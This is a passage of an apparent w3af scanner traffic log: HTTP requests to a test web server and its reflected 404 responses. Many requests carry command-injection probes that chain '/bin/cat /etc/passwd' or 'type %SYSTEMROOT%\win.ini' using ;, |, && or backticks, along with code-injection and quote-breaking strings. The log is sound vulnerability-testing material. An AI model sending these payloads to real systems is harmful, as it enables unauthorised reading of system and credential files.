                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 6bBCX4LD has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='6bBCX4LD'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="271">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Response.Write%28new+String%28%22tuyzr%22%2C5%29%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="584" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Response.Write%28new+String%28%22tuyzr%22%2C5%29%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="291">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/a%27b%22c%27d%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%27b%22c%27d%22 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%27b%22c%27d%22'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="292">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="294">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about /bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="295">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="564" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="296">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Choucroute Garnie&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;1/3 cup kosher salt, plus more for seasoning&lt;/li&gt;
        &lt;li&gt;2 tablespoons light brown sugar&lt;/li&gt;
        &lt;li&gt;3 pounds pork back ribs or baby back ribs, cut into 3 sections&lt;/li&gt;
        &lt;li&gt;6 pounds sauerkraut (in plastic bags), drained&lt;/li&gt;
        &lt;li&gt;1/4 cup duck or goose fat or peanut oil&lt;/li&gt;
        &lt;li&gt;1 large onion, coarsely chopped&lt;/li&gt;
        &lt;li&gt;4 large garlic cloves, coarsely chopped&lt;/li&gt;
        &lt;li&gt;20 juniper berries&lt;/li&gt;
        &lt;li&gt;3 large bay leaves&lt;/li&gt;
        &lt;li&gt;1/2 teaspoon caraway seeds&lt;/li&gt;
        &lt;li&gt;1 teaspoon freshly ground black pepper&lt;/li&gt;
        &lt;li&gt;3 cups chicken stock&lt;/li&gt;
        &lt;li&gt;1 1/2 cups Riesling or Pinot Gris&lt;/li&gt;
        &lt;li&gt;2 pounds Polish kielbasa, skinned and cut into 2-inch pieces&lt;/li&gt;
        &lt;li&gt;10 skinless hot dogs&lt;/li&gt;
        &lt;li&gt;One 2-pound piece of boneless boiled ham (3 to 4 inches wide), sliced 1/4 inch thick&lt;/li&gt;
        &lt;li&gt;2 pounds medium potatoes (about 10), peeled&lt;/li&gt;
        &lt;li&gt;Assorted mustards, for serving&lt;/li&gt;
    &lt;/ul&gt;

    &lt;a href='/choucroute'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="298">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="301">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="302">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="570" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%26%26type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="303">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7C/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="304">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3Btype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%3Btype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="305">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="306">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="307">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="308">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="309">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3B/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="310">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/run+type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="568" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/run+type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="311">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="312">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60/bin/cat+/etc/passwd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60/bin/cat+/etc/passwd%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60/bin/cat+/etc/passwd%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="313">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="314">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
